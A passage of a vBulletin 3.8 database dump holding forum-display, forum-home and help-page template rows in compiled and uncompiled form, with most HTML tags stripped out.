\r\n\r\n \r\n\r\n\r\n\".(($show[\'popups\']) ? (\"\r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\".(($show[\'inlinemod\']) ? (\"\r\n \r\n\") : (\"\")).\"\r\n\r\n\r\n\r\n\") : (\"\r\n\r\n\r\n\r\n\r\n\r\n $vbphrase[forum_tools] \r\n $vbphrase[search_this_forum] \r\n \r\n\r\n \r\n \r\n \r\n
\r\n \".(($show[\'member\']) ? (\"
\") : (\"\")).\"\r\n
\r\n
\r\n \r\n \r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
\r\n \r\n\r\n\r\n\r\n\")).\"\r\n\r\n\".(($show[\'ajax_js\']) ? (\"\r\n \r\n \r\n\") : (\"\")).\"\r\n\r\n\r\n\") : (\"\")).\"\r\n\r\n$forumhome_markread_script\r\n\r\n\".(($show[\'popups\'] AND $show[\'forumsearch\']) ? (\"\r\n\r\n\r\n\r\n\") : (\"\")).\"\r\n\r\n\r\n\".(($show[\'threadslist\']) ? (\"\r\n\r\n\r\n \r\n $vbphrase[new_posts] \r\n \".(($GLOBALS[\'vbulletin\']->options[\'usehotthreads\']) ? (\"\r\n options[\'hotnumberposts\'] . \"\", \"\" . $GLOBALS[\'vbulletin\']->options[\'hotnumberviews\'] . \"\") . \"\\\" border=\\\"0\\\" /> \r\n $vbphrase[hot_thread_with_new_posts] \r\n \") : (\"\r\n \r\n \")).\"\r\n \r\n\r\n \r\n $vbphrase[no_new_posts] \r\n \".(($GLOBALS[\'vbulletin\']->options[\'usehotthreads\']) ? (\"\r\n options[\'hotnumberposts\'] . \"\", \"\" . $GLOBALS[\'vbulletin\']->options[\'hotnumberviews\'] . \"\") . \"\\\" border=\\\"0\\\" /> \r\n $vbphrase[hot_thread_with_no_new_posts] \r\n \") : (\"\r\n \r\n \")).\"\r\n \r\n\r\n \r\n $vbphrase[thread_is_closed] \r\n \".(($show[\'dotthreads\']) ? (\"\r\n \r\n $vbphrase[you_have_posted_in_this_thread] \r\n \") : (\"\r\n \r\n \")).\"\r\n \r\n
\r\n\") : (\"\r\n\r\n\r\n \r\n \r\n \r\n \r\n $vbphrase[forum_contains_new_posts] \r\n \r\n \r\n \r\n $vbphrase[forum_contains_no_new_posts] \r\n \r\n \".(($GLOBALS[\'vbulletin\']->options[\'showlocks\']) ? (\"\r\n \r\n \r\n $vbphrase[forum_is_closed_for_posting] \r\n \r\n \") : (\"\")).\"\r\n
\r\n \r\n \r\n
\r\n\")).\"\r\n\r\n\r\n\r\n\r\n\r\n\r\n$footer\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$foruminfo[title_clean]1\"> - $vbphrase[page_x] - $vboptions[bbtitle] \r\n \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\r\n\r\n\r\n\r\n $vbphrase[subforums] : $foruminfo[title] \r\n \r\n \r\n \r\n \r\n
\r\n\r\n\r\n \r\n \r\n $vbphrase[forum] \r\n $vbphrase[last_post] \r\n $vbphrase[threads] \r\n $vbphrase[posts] \r\n \r\n $vbphrase[moderator] \r\n \r\n \r\n \r\n$forumbits\r\n
\r\n \r\n\r\n \r\n\r\n\r\n\r\n\r\n\r\n \r\n \r\n \r\n \r\n\r\n\r\n\r\n\r\n \r\n $pagenav \r\n \r\n
\r\n\r\n\r\n\r\n $vbphrase[threads_in_forum] : $foruminfo[title] \r\n \r\n \r\n \r\n \r\n \r\n
\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n \r\n\r\n$ad_location[ad_forumdisplay_afterthreads]\r\n\r\n\r\n\r\n\r\n \r\n \r\n \r\n \r\n\r\n\r\n\r\n $vbphrase[display_options] \r\n \r\n $vbphrase[currently_active_users] \r\n \r\n \r\n $vbphrase[moderators] \r\n \r\n \r\n\r\n $vbphrase[showing_threads_x_to_y_of_z] \r\n \r\n $totalonline ($vbphrase[x_members_y_guests] ) \r\n \r\n \r\n $vbphrase[moderators] : $totalmods \r\n \r\n \r\n\r\n \r\n\r\n \r\n \r\n \r\n $vbphrase[sorted_by]
\r\n \r\n $vbphrase[thread_title] \r\n $vbphrase[last_post_time] \r\n $vbphrase[thread_start_time] \r\n $vbphrase[number_of_replies] \r\n $vbphrase[number_of_views] \r\n $vbphrase[thread_starter] \r\n $vbphrase[thread_rating] \r\n \r\n \r\n \r\n $vbphrase[sort_order]
\r\n \r\n $vbphrase[ascending] \r\n $vbphrase[descending] \r\n \r\n \r\n \r\n $vbphrase[from_the]
\r\n \r\n $vbphrase[last_day] \r\n $vbphrase[last_2_days] \r\n $vbphrase[last_week] \r\n $vbphrase[last_10_days] \r\n $vbphrase[last_2_weeks] \r\n $vbphrase[last_month] \r\n $vbphrase[last_45_days] \r\n $vbphrase[last_2_months] \r\n $vbphrase[last_75_days] \r\n $vbphrase[last_100_days] \r\n $vbphrase[last_year] \r\n $vbphrase[beginning] \r\n \r\n \r\n \r\n \r\n \r\n \r\n $vbphrase[prefix]
\r\n \r\n $vbphrase[any_prefix_meta] \r\n $vbphrase[no_prefix_meta] \r\n $prefix_options\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
\r\n\r\n \r\n \r\n $activeusers
\r\n \r\n \r\n $moderatorslist
\r\n \r\n \r\n
\r\n\r\n \r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n \r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\n\r\n\r\n $vbphrase[forum_tools] \r\n $vbphrase[search_this_forum] \r\n \r\n\r\n \r\n \r\n \r\n \r\n \r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
\r\n \r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n \r\n \r\n\r\n\r\n \r\n\r\n$forumhome_markread_script\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\n\r\n\r\n \r\n $vbphrase[new_posts] \r\n \r\n $vbphrase[more_than_x_replies_or_y_views]\" border=\"0\" /> \r\n $vbphrase[hot_thread_with_new_posts] \r\n \r\n \r\n \r\n \r\n\r\n \r\n $vbphrase[no_new_posts] \r\n \r\n $vbphrase[more_than_x_replies_or_y_views]\" border=\"0\" /> \r\n $vbphrase[hot_thread_with_no_new_posts] \r\n \r\n \r\n \r\n \r\n\r\n \r\n $vbphrase[thread_is_closed] \r\n \r\n \r\n $vbphrase[you_have_posted_in_this_thread] \r\n \r\n \r\n \r\n \r\n
\r\n \r\n\r\n\r\n \r\n \r\n \r\n \r\n $vbphrase[forum_contains_new_posts] \r\n \r\n \r\n \r\n $vbphrase[forum_contains_no_new_posts] \r\n \r\n \r\n \r\n \r\n $vbphrase[forum_is_closed_for_posting] \r\n \r\n \r\n
\r\n \r\n \r\n
\r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n$footer\r\n\r\n', 'template', 1268732024, 'vBulletin Solutions', '3.8.5', 'vbulletin'),
(1314, -1, 'forumdisplay_loggedinuser', '\".(($show[\'comma_leader\']) ? (\", \") : (\"\")).\"$stylevar[dirmark]session->vars[\'sessionurl\'] . \"u=$loggedin[userid]\\\">$loggedin[musername] $loggedin[invisiblemark]$loggedin[buddymark]', ', $stylevar[dirmark]$loggedin[musername] $loggedin[invisiblemark]$loggedin[buddymark]', 'template', 1202481712, 'vBulletin Solutions', '3.7.0 Beta 5', 'vbulletin'),
(1315, -1, 'forumdisplay_moderator', '\".(($show[\'comma_leader\']) ? (\", \") : (\"\")).\"session->vars[\'sessionurl\'] . \"u=$moderator[userid]\\\">$moderator[musername] ', ', $moderator[musername] ', 'template', 1202481721, 'vBulletin Solutions', '3.7.0 Beta 5', 'vbulletin'),
(1316, -1, 'forumdisplay_sortarrow', ' ', ' ', 'template', 1217952121, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'),
(1317, -1, 'FORUMHOME', '$stylevar[htmldoctype]\r\n\r\n\r\n \r\n \r\n \r\n \r\n \r\n $headinclude\r\n \" . construct_phrase(\"$vbphrase[x_powered_by_vbulletin]\", \"\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \"\") . \" \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\".(($show[\'guest\']) ? (\"\r\n\r\n\r\n\r\n \" . construct_phrase(\"$vbphrase[welcome_to_the_x]\", \"\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \"\") . \" \r\n \r\n\r\n \r\n \" . construct_phrase(\"$vbphrase[first_visit_message]\", \"faq.php\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl_q\'] . \"\", \"register.php\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl_q\'] . \"\") . \"\r\n \r\n \r\n
\r\n\r\n \r\n\") : (\"\")).\"\r\n\r\n\r\n\r\n\r\n \r\n \r\n $vbphrase[forum] \r\n $vbphrase[last_post] \r\n $vbphrase[threads] \r\n $vbphrase[posts] \r\n \".(($GLOBALS[\'vbulletin\']->options[\'showmoderatorcolumn\']) ? (\"\r\n $vbphrase[moderator] \r\n \") : (\"\")).\"\r\n \r\n \r\n$forumbits\r\n\r\n \r\n \r\n \r\n \r\n
\r\n$forumhome_markread_script\r\n\r\n\r\n \r\n$ad_location[ad_forumhome_afterforums]\r\n \r\n\r\n\r\n\r\n\r\n \r\n $vbphrase[whats_going_on] \r\n \r\n \r\n$template_hook[forumhome_wgo_pos1]\r\n\".(($show[\'loggedinusers\']) ? (\"\r\n\r\n\r\n \r\n \r\n \r\n session->vars[\'sessionurl_q\'] . \"\\\">$vbphrase[currently_active_users] : $totalonline (\" . construct_phrase(\"$vbphrase[x_members_and_y_guests]\", \"$numberregistered\", \"$numberguest\") . \")\r\n \r\n \r\n \r\n\r\n \r\n session->vars[\'sessionurl_q\'] . \"\\\"> \r\n \r\n \r\n
\" . construct_phrase(\"$vbphrase[most_users_ever_online_was_x_y_at_z]\", \"$recordusers\", \"$recorddate\", \"$recordtime\") . \"
\r\n
$activeusers
\r\n
\r\n \r\n \r\n \r\n\r\n\") : (\"\")).\"\r\n$template_hook[forumhome_wgo_pos2]\r\n\r\n \r\n \r\n \r\n \" . construct_phrase(\"$vbphrase[x_statistics]\", \"\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \"\") . \"\r\n \r\n \r\n \r\n\r\n \r\n options[\'bbtitle\'] . \"\") . \"\\\" border=\\\"0\\\" /> \r\n \r\n \r\n
\r\n $vbphrase[threads]: $totalthreads,\r\n $vbphrase[posts]: $totalposts,\r\n $vbphrase[members]: $numbermembers\".(($show[\'activemembers\']) ? (\",\r\n options[\'activememberdays\'] . \"\") . \"\\\">$vbphrase[active_members]: $activemembers \r\n \") : (\"\")).\"\r\n
\r\n
\" . construct_phrase(\"$vbphrase[welcome_to_our_newest_member_x]\", \"member.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"u=$newuserid\", \"$newusername\") . \"
\r\n $template_hook[forumhome_wgo_stats]\r\n
\r\n \r\n \r\n \r\n$template_hook[forumhome_wgo_pos3]\r\n\".(($show[\'birthdays\']) ? (\"\r\n\r\n\r\n \r\n \r\n \r\n $vbphrase[todays_birthdays]\r\n \r\n \r\n \r\n\r\n \r\n session->vars[\'sessionurl\'] . \"do=getday&day=$today&sb=1\\\"> \r\n $birthdays
\r\n \r\n \r\n\r\n\") : (\"\")).\"\r\n$template_hook[forumhome_wgo_pos4]\r\n\".(($show[\'upcomingevents\']) ? (\"\r\n\r\n \r\n \r\n \r\n \".(($show[\'todaysevents\']) ? (\"$vbphrase[todays_events]\") : (\"\" . construct_phrase(\"$vbphrase[upcoming_events_for_the_next_x_days]\", \"\" . $GLOBALS[\'vbulletin\']->options[\'showevents\'] . \"\") . \"\")).\"\r\n \r\n \r\n \r\n\r\n \r\n session->vars[\'sessionurl_q\'] . \"\\\"> \r\n $upcomingevents
\r\n \r\n \r\n\") : (\"\")).\"\r\n$template_hook[forumhome_wgo_pos5]\r\n
\r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n$footer\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n \r\n \r\n \r\n \r\n \r\n $headinclude\r\n $vbphrase[x_powered_by_vbulletin] \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\r\n\r\n\r\n\r\n $vbphrase[welcome_to_the_x] \r\n \r\n\r\n \r\n $vbphrase[first_visit_message] \r\n \r\n \r\n
\r\n\r\n \r\n \r\n\r\n\r\n\r\n\r\n \r\n \r\n $vbphrase[forum] \r\n $vbphrase[last_post] \r\n $vbphrase[threads] \r\n $vbphrase[posts] \r\n \r\n $vbphrase[moderator] \r\n \r\n \r\n \r\n$forumbits\r\n\r\n \r\n \r\n \r\n \r\n
\r\n$forumhome_markread_script\r\n\r\n\r\n \r\n$ad_location[ad_forumhome_afterforums]\r\n \r\n\r\n\r\n\r\n\r\n \r\n $vbphrase[whats_going_on] \r\n \r\n \r\n$template_hook[forumhome_wgo_pos1]\r\n\r\n\r\n\r\n \r\n \r\n \r\n $vbphrase[currently_active_users] : $totalonline ($vbphrase[x_members_and_y_guests] )\r\n \r\n \r\n \r\n\r\n \r\n \r\n \r\n \r\n
$vbphrase[most_users_ever_online_was_x_y_at_z] \r\n
$activeusers
\r\n
\r\n \r\n \r\n \r\n\r\n \r\n$template_hook[forumhome_wgo_pos2]\r\n\r\n \r\n \r\n \r\n $vbphrase[x_statistics] \r\n \r\n \r\n \r\n\r\n \r\n $vbphrase[x_statistics]\" border=\"0\" /> \r\n \r\n \r\n
\r\n $vbphrase[threads]: $totalthreads,\r\n $vbphrase[posts]: $totalposts,\r\n $vbphrase[members]: $numbermembers,\r\n $vbphrase[within_the_last_x_days]\">$vbphrase[active_members]: $activemembers \r\n \r\n
\r\n
$vbphrase[welcome_to_our_newest_member_x] \r\n $template_hook[forumhome_wgo_stats]\r\n
\r\n \r\n \r\n \r\n$template_hook[forumhome_wgo_pos3]\r\n\r\n\r\n\r\n \r\n \r\n \r\n $vbphrase[todays_birthdays]\r\n \r\n \r\n \r\n\r\n \r\n \r\n $birthdays
\r\n \r\n \r\n\r\n \r\n$template_hook[forumhome_wgo_pos4]\r\n\r\n\r\n \r\n \r\n \r\n $vbphrase[todays_events]$vbphrase[upcoming_events_for_the_next_x_days] \r\n \r\n \r\n \r\n\r\n \r\n \r\n $upcomingevents
\r\n \r\n \r\n \r\n$template_hook[forumhome_wgo_pos5]\r\n
\r\n \r\n\r\n\r\n\r\n\r\n\r\n \r\n \r\n \r\n \r\n $vbphrase[forum_contains_new_posts] \r\n \r\n \r\n \r\n $vbphrase[forum_contains_no_new_posts] \r\n \r\n \r\n \r\n \r\n $vbphrase[forum_is_closed_for_posting] \r\n \r\n \r\n
\r\n \r\n \r\n \r\n $vbphrase[log_out_x] \r\n \r\n \r\n \r\n
\r\n\r\n\r\n$footer\r\n\r\n', 'template', 1266511506, 'vBulletin Solutions', '3.8.5', 'vbulletin'),
(1318, -1, 'forumhome_birthdaybit', 'session->vars[\'sessionurl\'] . \"u=$birthday[userid]\\\">$birthday[username] \".(($birthday[age]) ? (\" ($birthday[age])\") : (\"\")).\"', '$birthday[username] ($birthday[age]) ', 'template', 1207227188, 'vBulletin Solutions', '3.7.0 Release Candidate 3', 'vbulletin'),
(1319, -1, 'forumhome_event', '\r\n\".((!$GLOBALS[\'vbulletin\']->options[\'showeventtype\']) ? (\"\r\n $callink: $eventdates\r\n\") : (\"\r\n $eventdate: $daysevents\r\n\")).\"\r\n
', '\r\n\r\n $callink: $eventdates\r\n \r\n $eventdate: $daysevents\r\n \r\n
', 'template', 1079041716, 'vBulletin Solutions', '', 'vbulletin'),
(1320, -1, 'forumhome_forumbit_level1_nopost', '\".((!$show[\'collapsable_forums\']) ? (\"\r\n\r\n\") : (\"\")).\"\r\n \r\n options[showmoderatorcolumn]) ? (\"6\") : (\"5\")).\"\\\">\r\n \".(($childforumbits) ? (\"\r\n \r\n \") : (\"\")).\"\r\n session->vars[\'sessionurl\'] . \"f=$forum[forumid]\\\">$forum[title] \r\n \".(($show[\'forumdescription\']) ? (\"$forum[description]
\") : (\"\")).\"\r\n \".(($show[\'subforums\']) ? (\"$vbphrase[subforums] : $forum[subforums]
\") : (\"\")).\"\r\n \r\n \r\n\".((!$show[\'collapsable_forums\']) ? (\"\r\n \r\n\") : (\"\")).\"\r\n\".(($childforumbits) ? (\"\r\n\".((!$show[\'collapsable_forums\']) ? (\"\r\n\r\n\") : (\"\")).\"\r\n$childforumbits\r\n\".((!$show[\'collapsable_forums\']) ? (\"\r\n \r\n\") : (\"\")).\"\r\n\") : (\"\")).\"', '\r\n\r\n\r\n \r\n 6 5\">\r\n \r\n \r\n \r\n $forum[title] \r\n $forum[description]
\r\n $vbphrase[subforums] : $forum[subforums]
\r\n \r\n \r\n\r\n \r\n \r\n\r\n\r\n\r\n\r\n$childforumbits\r\n\r\n \r\n \r\n ', 'template', 1225902511, 'vBulletin Solutions', '3.8.0 Beta 2', 'vbulletin'),
(1321, -1, 'forumhome_forumbit_level1_post', '\".((!$show[\'collapsable_forums\']) ? (\"\r\n\r\n\") : (\"\")).\"\r\n \r\n \r\n\r\n \r\n \r\n \r\n options[\'cleargifurl\'] . \"\\\" alt=\\\"\\\" width=\\\"9\\\" height=\\\"1\\\" border=\\\"0\\\" /> \r\n \r\n \r\n \".(($show[\'forumdescription\']) ? (\"$forum[description]
\") : (\"\")).\"\r\n \".(($show[\'forumsubscription\']) ? (\"\") : (\"\")).\"\r\n \".(($show[\'subforums\']) ? (\"$vbphrase[subforums] : $forum[subforums]
\") : (\"\")).\"\r\n \r\n \r\n
\r\n\r\n \r\n $forum[lastpostinfo] \r\n $forum[threadcount] \r\n $forum[replycount] \r\n \".(($GLOBALS[\'vbulletin\']->options[\'showmoderatorcolumn\']) ? (\"\r\n $forum[moderators]
\r\n \") : (\"\")).\"\r\n \r\n\r\n\".((!$show[\'collapsable_forums\']) ? (\"\r\n \r\n\") : (\"\")).\"\r\n\r\n\".(($childforumbits) ? (\"\r\n\".((!$show[\'collapsable_forums\']) ? (\"\r\n\r\n\") : (\"\")).\"\r\n $childforumbits\r\n\".((!$show[\'collapsable_forums\']) ? (\"\r\n \r\n\") : (\"\")).\"\r\n\") : (\"\")).\"', '\r\n\r\n\r\n \r\n \r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n $forum[description]
\r\n \r\n $vbphrase[subforums] : $forum[subforums]
\r\n \r\n \r\n
\r\n\r\n \r\n $forum[lastpostinfo] \r\n $forum[threadcount] \r\n $forum[replycount] \r\n \r\n $forum[moderators]
\r\n \r\n \r\n\r\n\r\n \r\n \r\n\r\n\r\n\r\n\r\n\r\n $childforumbits\r\n\r\n \r\n \r\n ', 'template', 1225902484, 'vBulletin Solutions', '3.8.0 Beta 2', 'vbulletin'),
(1322, -1, 'forumhome_forumbit_level2_nopost', '\r\n \r\n options[\'showmoderatorcolumn\']) ? (\"5\") : (\"4\")).\"\\\">\r\n session->vars[\'sessionurl\'] . \"f=$forum[forumid]\\\">$forum[title] \r\n \".(($show[\'forumdescription\']) ? (\"$forum[description]
\") : (\"\")).\"\r\n \".(($show[\'subforums\']) ? (\"$vbphrase[subforums] : $forum[subforums]
\") : (\"\")).\"\r\n \r\n \r\n$childforumbits\r\n', '\r\n \r\n 5 4\">\r\n $forum[title] \r\n $forum[description]
\r\n $vbphrase[subforums] : $forum[subforums]
\r\n \r\n \r\n$childforumbits\r\n', 'template', 1070052831, 'vBulletin Solutions', '', 'vbulletin'),
(1323, -1, 'forumhome_forumbit_level2_post', '\r\n \r\n \r\n \r\n \".(($show[\'forumdescription\']) ? (\"$forum[description]
\") : (\"\")).\"\r\n \".(($show[\'forumsubscription\']) ? (\"\") : (\"\")).\"\r\n \".(($show[\'subforums\']) ? (\"$vbphrase[subforums] : $forum[subforums]
\") : (\"\")).\"\r\n \r\n $forum[lastpostinfo] \r\n $forum[threadcount] \r\n $forum[replycount] \r\n \".(($GLOBALS[\'vbulletin\']->options[\'showmoderatorcolumn\']) ? (\"\r\n $forum[moderators]
\r\n \") : (\"\")).\"\r\n \r\n$childforumbits', '\r\n \r\n \r\n \r\n $forum[description]
\r\n \r\n $vbphrase[subforums] : $forum[subforums]
\r\n \r\n $forum[lastpostinfo] \r\n $forum[threadcount] \r\n $forum[replycount] \r\n \r\n $forum[moderators]
\r\n \r\n \r\n$childforumbits', 'template', 1196952880, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'),
(1324, -1, 'forumhome_lastpostby', '\".(($show[\'lastpostinfo\']) ? (\"\r\n\r\n
\r\n
\r\n \" . construct_phrase(\"$vbphrase[by_x]\", \"member.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"find=lastposter&f=$lastpostinfo[forumid]\", \"$lastpostinfo[lastposter]\") . \"\r\n
\r\n
\r\n
\r\n\") : (\"\r\n\r\n\")).\"', '\r\n\r\n
\r\n
; float:$stylevar[left]\">\r\n
$vbphrase[by_x] \r\n
\r\n
\r\n $lastpostinfo[lastpostdate]
$lastpostinfo[lastposttime] \r\n
\r\n
\r\n
\r\n \r\n\r\n $lastpostinfo[lastpostdate]
$lastpostinfo[lastposttime] \r\n
\r\n
\r\n ', 'template', 1209395389, 'vBulletin Solutions', '3.7.0', 'vbulletin'),
(1325, -1, 'forumhome_loggedinuser', '\".(($show[\'comma_leader\']) ? (\", \") : (\"\")).\"$stylevar[dirmark]session->vars[\'sessionurl\'] . \"u=$loggedin[userid]\\\">$loggedin[musername] $loggedin[invisiblemark]$loggedin[buddymark]', ', $stylevar[dirmark]$loggedin[musername] $loggedin[invisiblemark]$loggedin[buddymark]', 'template', 1202481733, 'vBulletin Solutions', '3.7.0 Beta 5', 'vbulletin'),
(1326, -1, 'forumhome_markread_script', '\r\n', '\r\n', 'template', 1142452258, 'vBulletin Solutions', '3.6.0 Beta 1', 'vbulletin'),
(1327, -1, 'forumhome_moderator', '\".(($show[\'comma_leader\']) ? (\", \") : (\"\")).\"session->vars[\'sessionurl\'] . \"u=$moderator[userid]\\\">$moderator[musername] ', ', $moderator[musername] ', 'template', 1202481739, 'vBulletin Solutions', '3.7.0 Beta 5', 'vbulletin'),
(1328, -1, 'forumhome_subforumbit_nopost', ' session->vars[\'sessionurl\'] . \"f=$forum[forumid]\\\">$forum[title] ', ' $forum[title] ', 'template', 1142341548, 'vBulletin Solutions', '3.6.0 Beta 1', 'vbulletin'),
(1329, -1, 'forumhome_subforumbit_post', ' session->vars[\'sessionurl\'] . \"f=$forum[forumid]\\\">$forum[title] ', ' $forum[title] ', 'template', 1142341577, 'vBulletin Solutions', '3.6.0 Beta 1', 'vbulletin'),
(1330, -1, 'forumhome_subforumseparator_nopost', ', ', ', ', 'template', 1069084365, 'vBulletin Solutions', '', 'vbulletin'),
(1331, -1, 'forumhome_subforumseparator_post', ', ', ', ', 'template', 1067363268, 'vBulletin Solutions', '', 'vbulletin'),
(1332, -1, 'help_avatars', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $vbphrase[avatar_list] \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\r\n\r\n $vbphrase[avatars] \r\n \r\n\r\n \r\n $vbphrase[avatars_small_images]\r\n \r\n \r\n
\r\n\r\n \r\n\r\n\".(($show[\'pagenav\']) ? (\"\r\n\r\n\r\n $pagenav \r\n \r\n
\r\n\") : (\"\")).\"\r\n\r\n\r\n options[\'numavatarswide\'] . \"\\\">\r\n \".(($totalavatars) ? (\"\" . construct_phrase(\"$vbphrase[showing_avatars_x_to_y_of_z]\", \"$first\", \"$last\", \"$totalavatars\") . \" \") : (\"\")).\"\r\n $vbphrase[avatar_list]\r\n \r\n \r\n\".(( $avatarbits != \'\' ) ? (\"\r\n$avatarbits\r\n\") : (\"\r\n\r\n options[\'numavatarswide\'] . \"\\\">$vbphrase[no_predefined_avatars_available] \r\n \r\n\")).\"\r\n
\r\n\r\n$footer\r\n\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$vboptions[bbtitle] - $vbphrase[avatar_list] \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\r\n\r\n $vbphrase[avatars] \r\n \r\n\r\n \r\n $vbphrase[avatars_small_images]\r\n \r\n \r\n
\r\n\r\n \r\n\r\n\r\n\r\n\r\n $pagenav \r\n \r\n
\r\n \r\n\r\n\r\n \r\n $vbphrase[showing_avatars_x_to_y_of_z] \r\n $vbphrase[avatar_list]\r\n \r\n \r\n\r\n$avatarbits\r\n \r\n\r\n $vbphrase[no_predefined_avatars_available] \r\n \r\n \r\n
\r\n\r\n$footer\r\n\r\n\r\n', 'template', 1195729859, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'),
(1333, -1, 'help_avatars_avatar', ' $avatar[title] ', ' $avatar[title] ', 'template', 1069239567, 'vBulletin Solutions', '', 'vbulletin'),
(1334, -1, 'help_avatars_category', '\r\n options[\'numavatarswide\'] . \"\\\">\" . construct_phrase(\"$vbphrase[x_requiring_at_least_y_posts]\", \"$avatar[category]\", \"$avatar[minimumposts]\") . \" \r\n \r\n', '\r\n $vbphrase[x_requiring_at_least_y_posts] \r\n \r\n', 'template', 1070053618, 'vBulletin Solutions', '', 'vbulletin'),
(1335, -1, 'help_avatars_row', '\r\n$avatarcells\r\n\".(($remainingcolumns > 0) ? (\"\r\n \r\n\") : (\"\")).\"\r\n ', '\r\n$avatarcells\r\n 0\">\r\n \r\n \r\n ', 'template', 1149698778, 'vBulletin Solutions', '3.6.0 Beta 1', 'vbulletin'),
(1336, -1, 'help_bbcodes', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $vbphrase[bbcode_list] \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\r\n\r\n $vbphrase[bb_code] \r\n \r\n\r\n \r\n $vbphrase[bb_code_based_on_html]\r\n \r\n \r\n\r\n $vbphrase[bbcode_list] \r\n \r\n\".(($show[\'bbcodebasic\']) ? (\"\r\n \r\n [b] , [i] , [u] \r\n $vbphrase[bold] / $vbphrase[italic] / $vbphrase[underline] \r\n \r\n\") : (\"\")).\"\r\n\".(($show[\'bbcodecolor\']) ? (\"\r\n \r\n [color] \r\n $vbphrase[color] \r\n \r\n\") : (\"\")).\"\r\n\".(($show[\'bbcodesize\']) ? (\"\r\n \r\n [size] \r\n $vbphrase[size] \r\n \r\n\") : (\"\")).\"\r\n\".(($show[\'bbcodefont\']) ? (\"\r\n \r\n [font] \r\n $vbphrase[font] \r\n \r\n\") : (\"\")).\"\r\n\r\n [highlight] \r\n $vbphrase[highlight] \r\n \r\n\".(($show[\'bbcodealign\']) ? (\"\r\n \r\n [left] , [right] , [center] \r\n $vbphrase[left] / $vbphrase[right] / $vbphrase[center] \r\n \r\n \r\n [indent] \r\n $vbphrase[indent] \r\n \r\n\") : (\"\")).\"\r\n\".(($show[\'bbcodeurl\']) ? (\"\r\n \r\n [email] \r\n $vbphrase[email_linking] \r\n \r\n \r\n [url] \r\n $vbphrase[url_hyperlinking] \r\n \r\n \r\n [thread] \r\n $vbphrase[thread_linking] \r\n \r\n \r\n [post] \r\n $vbphrase[post_linking] \r\n \r\n\") : (\"\")).\"\r\n\".(($show[\'bbcodelist\']) ? (\"\r\n \r\n [list] \r\n $vbphrase[bulleted_lists] / $vbphrase[advanced_lists] \r\n \r\n\") : (\"\")).\"\r\n\r\n [img] \r\n $vbphrase[images] \r\n \r\n\".(($show[\'bbcodecode\']) ? (\"\r\n \r\n [code] \r\n $vbphrase[code] \r\n \r\n\") : (\"\")).\"\r\n\".(($show[\'bbcodephp\']) ? (\"\r\n \r\n [php] \r\n $vbphrase[php_code] \r\n \r\n\") : (\"\")).\"\r\n\".(($show[\'bbcodehtml\']) ? (\"\r\n \r\n [html] \r\n $vbphrase[html_code] \r\n \r\n\") : (\"\")).\"\r\n\r\n [quote] \r\n $vbphrase[quote] \r\n \r\n\r\n [noparse] \r\n $vbphrase[stop_bbcode_parsing] \r\n \r\n\r\n [attach] \r\n $vbphrase[attachment] \r\n \r\n\".(($show[\'bbcodesigpic\']) ? (\"\r\n \r\n [sigpic] \r\n $vbphrase[signature_picture] \r\n \r\n\") : (\"\")).\"\r\n$template[bbcodelinks]\r\n\r\n \r\n $vbphrase[incorrect_bb_code_usage]\r\n \r\n \r\n
\r\n\r\n \r\n\r\n\r\n\r\n\r\n\".(($show[\'bbcodebasic\']) ? (\"\r\n\r\n \r\n \r\n $vbphrase[bold] / $vbphrase[italic] / $vbphrase[underline] \r\n \r\n \r\n $vbphrase[b_i_and_u_tags_allow] \r\n \r\n \r\n $vbphrase[usage] \r\n \r\n [b]$vbphrase[value] [/b] \r\n [i]$vbphrase[value] [/i] \r\n [u]$vbphrase[value] [/u]\r\n \r\n \r\n \r\n $vbphrase[example_usage] \r\n \r\n [b]$vbphrase[this_text_is_bold][/b] \r\n [i]$vbphrase[this_text_is_italic][/i] \r\n [u]$vbphrase[this_text_is_underlined][/u]\r\n \r\n \r\n \r\n $vbphrase[example_output] \r\n \r\n $vbphrase[this_text_is_bold] \r\n $vbphrase[this_text_is_italic] \r\n $vbphrase[this_text_is_underlined] \r\n \r\n \r\n
